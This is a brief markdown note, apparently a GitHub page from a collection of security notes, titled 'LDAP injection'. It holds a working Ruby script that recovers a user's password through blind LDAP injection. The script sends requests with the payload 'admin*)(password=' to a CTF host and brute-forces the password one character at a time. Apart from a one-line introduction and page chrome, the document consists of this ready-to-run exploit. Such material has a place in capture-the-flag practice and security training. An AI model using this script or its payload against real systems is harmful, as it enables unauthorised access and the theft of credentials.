LDAP injection

The is a very basic script that will retrieve the password of a user in a Blind LDAP Injection case by bruteforcing all characters one by one.

#!/usr/bin/env ruby
require 'net/http'
alphabet = [*'a'..'z', *'A'..'Z', *'0'..'9'] + '_@{}-/()!"$%=^[]:;'.split('')
flag = ''
(0..50).each do |i|
  puts("[i] Looking for number #{i}")
  alphabet.each do |char|
    r = Net::HTTP.get(URI("http://ctf.web?action=dir&search=admin*)(password=#{flag}#{char}"))
    if /TRUE CONDITION/.match?(r)
      flag += char
      puts("[+] Flag: #{flag}")
      break
    end
  end
end

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

ldap-injection.md

ldap-injection.md

LDAP injection

Files

ldap-injection.md

Latest commit

History

ldap-injection.md

File metadata and controls

LDAP injection